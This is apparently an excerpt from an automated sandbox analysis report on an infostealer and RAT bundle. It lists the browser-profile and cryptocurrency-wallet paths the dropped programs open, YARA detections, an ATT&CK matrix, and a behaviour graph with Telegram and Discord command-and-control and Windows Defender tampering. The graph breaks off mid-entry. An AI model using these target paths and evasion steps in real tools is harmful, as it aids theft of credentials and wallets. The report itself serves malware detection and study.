                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings
                                Tries to steal Crypto Currency Wallets
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Yara detected Generic Python Stealer
                                Source: Yara matchFile source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2274816378.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2219861394.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: cstealer.exe PID: 6608, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cstealer.exe PID: 3292, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Yara detected Blank Grabber
                                Source: Yara matchFile source: 00000012.00000003.2244326949.00000177139C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000003.2244326949.00000177139C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.2290157848.0000020710C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI14722\rarreg.key, type: DROPPED
                                Yara detected CStealer
                                Source: Yara matchFile source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2292462578.0000025416446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000005C.00000003.2565952065.00000239F3175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2632028088.00000271D9EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2274816378.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2289697858.0000025416446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2294300603.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2315471256.0000020102B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2285580339.0000025416469000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2207767340.0000020102CDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2219861394.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: cstealer.exe PID: 6608, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cstealer.exe PID: 3292, type: MEMORYSTR
                                Yara detected Discord Token Stealer
                                Source: Yara matchFile source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Yara detected Millenuim RAT
                                Source: Yara matchFile source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Yara detected Telegram RAT
                                Source: Yara matchFile source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Yara detected Generic Python Stealer
                                Source: Yara matchFile source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2274816378.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2219861394.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: cstealer.exe PID: 6608, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cstealer.exe PID: 3292, type: MEMORYSTR
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8032B5D bind,WSAGetLastError,9_2_00007FF8A8032B5D
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8B7E35260 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,Py_BuildValue,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,sqlite3_bind_blob,PyBuffer_Release,sqlite3_bind_null,PyFloat_AsDouble,sqlite3_bind_double,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyUnicode_FromString,PyDict_Type,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Fetch,sqlite3_db_handle,_PyErr_ChainExceptions,PyList_GetItem,PyObject_CallOneArg,_Py_Dealloc,PyErr_Occurred,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,PyErr_Format,PyObject_CallOneArg,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,PySequence_Check,PyErr_Fetch,sqlite3_db_handle,_PyErr_ChainExceptions,PySequence_Size,PyErr_Format,PyObject_GetItem,PyErr_Occurred,PyErr_Format,PyErr_Format,PyErr_SetString,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyExc_LookupError,PyErr_ExceptionMatches,_Py_Dealloc,PyObject_CallOneArg,_Py_Dealloc,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,_Py_Dealloc,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,9_2_00007FF8B7E35260
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8B7E36A54 PyFloat_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyObject_CheckBuffer,PyErr_Format,sqlite3_bind_null,PyObject_GetBuffer,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,sqlite3_bind_blob,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,9_2_00007FF8B7E36A54

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting                                		Valid Accounts341
                                Windows Management Instrumentation                                		1
                                Scripting                                		1
                                Abuse Elevation Control Mechanism                                		41
                                Disable or Modify Tools                                		1
                                OS Credential Dumping                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Web Service                                		Exfiltration Over Other Network Medium1
                                Data Encrypted for Impact
                                CredentialsDomainsDefault Accounts2
                                Native API                                		11
                                DLL Side-Loading                                		11
                                DLL Side-Loading                                		11
                                Deobfuscate/Decode Files or Information                                		1
                                Credential API Hooking                                		3
                                File and Directory Discovery                                		Remote Desktop Protocol2
                                Data from Local System                                		1
                                Ingress Tool Transfer                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts112
                                Command and Scripting Interpreter                                		2
                                Registry Run Keys / Startup Folder                                		311
                                Process Injection                                		1
                                Abuse Elevation Control Mechanism                                		Security Account Manager47
                                System Information Discovery                                		SMB/Windows Admin Shares1
                                Email Collection                                		11
                                Encrypted Channel                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                PowerShell                                		Login Hook2
                                Registry Run Keys / Startup Folder                                		21
                                Obfuscated Files or Information                                		NTDS461
                                Security Software Discovery                                		Distributed Component Object Model1
                                Credential API Hooking                                		3
                                Non-Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                                Software Packing                                		LSA Secrets2
                                Process Discovery                                		SSH1
                                Clipboard Data                                		4
                                Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                Timestomp                                		Cached Domain Credentials351
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                                DLL Side-Loading                                		DCSync1
                                Application Window Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
                                Rootkit                                		Proc Filesystem1
                                System Network Configuration Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                Masquerading                                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron351
                                Virtualization/Sandbox Evasion                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                                Process Injection                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                Hidden Files and Directories                                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1439028 Sample: DevxExecutor.exe Startdate: 09/05/2024 Architecture: WINDOWS Score: 100 165 api.telegram.org 2->165 167 raw.githubusercontent.com 2->167 169 2 other IPs or domains 2->169 197 Multi AV Scanner detection for domain / URL 2->197 199 Antivirus detection for URL or domain 2->199 201 Antivirus detection for dropped file 2->201 205 26 other signatures 2->205 15 DevxExecutor.exe 4 2->15         started        18 powershell.exe 2->18         started        signatures3 203 Uses the Telegram API (likely for C&C communication) 165->203 process4 file5 161 C:\Users\user\AppData\Local\Temp\main.exe, PE32+ 15->161 dropped 163 C:\Users\user\AppData\Local\...\cstealer.exe, PE32+ 15->163 dropped 21 main.exe 13 15->21         started        25 cstealer.exe 25 15->25         started        175 Loading BitLocker PowerShell Module 18->175 27 conhost.exe 18->27         started        29 WmiPrvSE.exe 18->29         started        signatures6 process7 file8 125 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 21->125 dropped 127 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 21->127 dropped 129 C:\Users\user\AppData\Local\...\python311.dll, PE32+ 21->129 dropped 137 8 other malicious files 21->137 dropped 225 Found pyInstaller with non standard icon 21->225 31 main.exe 21->31         started        131 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 25->131 dropped 133 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 25->133 dropped 135 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 25->135 dropped 139 16 other malicious files 25->139 dropped 227 Potentially malicious time measurement code found 25->227 33 cstealer.exe 25->33         started        signatures9 process10 process11 35 cmd.exe 1 31->35         started        37 cmd.exe 1 33->37         started        signatures12 40 Build.exe 6 35->40         started        43 conhost.exe 35->43         started        217 Very long command line found 37->217 219 Encrypted powershell cmdline option found 37->219 221 Bypasses PowerShell execution policy 37->221 223 4 other signatures 37->223 45 cstealer.exe 25 37->45         started        47 conhost.exe 37->47         started        process13 file14 141 C:\ProgramData\Microsoft\hacn.exe, PE32+ 40->141 dropped 143 C:\ProgramData\Microsoft\based.exe, PE32+ 40->143 dropped 49 hacn.exe 40->49         started        53 based.exe 40->53         started        145 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 45->145 dropped 147 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 45->147 dropped 149 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 45->149 dropped 151 16 other malicious files 45->151 dropped 55 cstealer.exe 45->55         started        process15 file16 103 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 49->103 dropped 105 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 49->105 dropped 107 C:\Users\user\AppData\Local\Temp\...\s.exe, PE32 49->107 dropped 115 8 other files (7 malicious) 49->115 dropped 177 Multi AV Scanner detection for dropped file 49->177 179 Machine Learning detection for dropped file 49->179 57 hacn.exe 49->57         started        109 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 53->109 dropped 111 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 53->111 dropped 113 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 53->113 dropped 117 16 other malicious files 53->117 dropped 181 Very long command line found 53->181 183 Modifies Windows Defender protection settings 53->183 185 Adds a directory exclusion to Windows Defender 53->185 187 2 other signatures 53->187 59 based.exe 53->59         started        63 cmd.exe 1 55->63         started        signatures17 process18 dnsIp19 65 cmd.exe 57->65         started        171 api.telegram.org 149.154.167.220, 443, 49746 TELEGRAMRU United Kingdom 59->171 173 discord.com 162.159.138.232, 443, 49742 CLOUDFLARENETUS United States 59->173 229 Very long command line found 59->229 231 Tries to harvest and steal browser information (history, passwords, etc) 59->231 233 Modifies Windows Defender protection settings 59->233 235 5 other signatures 59->235 67 cmd.exe 59->67         started        70 cmd.exe 59->70         started        72 cmd.exe 59->72         started        79 16 other processes 59->79 74 cstealer.exe 25 63->74         started        77 conhost.exe 63->77         started        signatures20 process21 file22 81 s.exe 65->81         started        85 conhost.exe 65->85         started        207 Adds a directory exclusion to Windows Defender 67->207 87 powershell.exe 67->87         started        89 conhost.exe 67->89         started        209 Modifies Windows Defender protection settings 70->209 95 2 other processes 70->95 97 2 other processes 72->97 153 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 74->153 dropped 155 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 74->155 dropped 157 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 74->157 dropped 159 16 other malicious files 74->159 dropped 91 cstealer.exe 74->91         started        211 Very long command line found 79->211 213 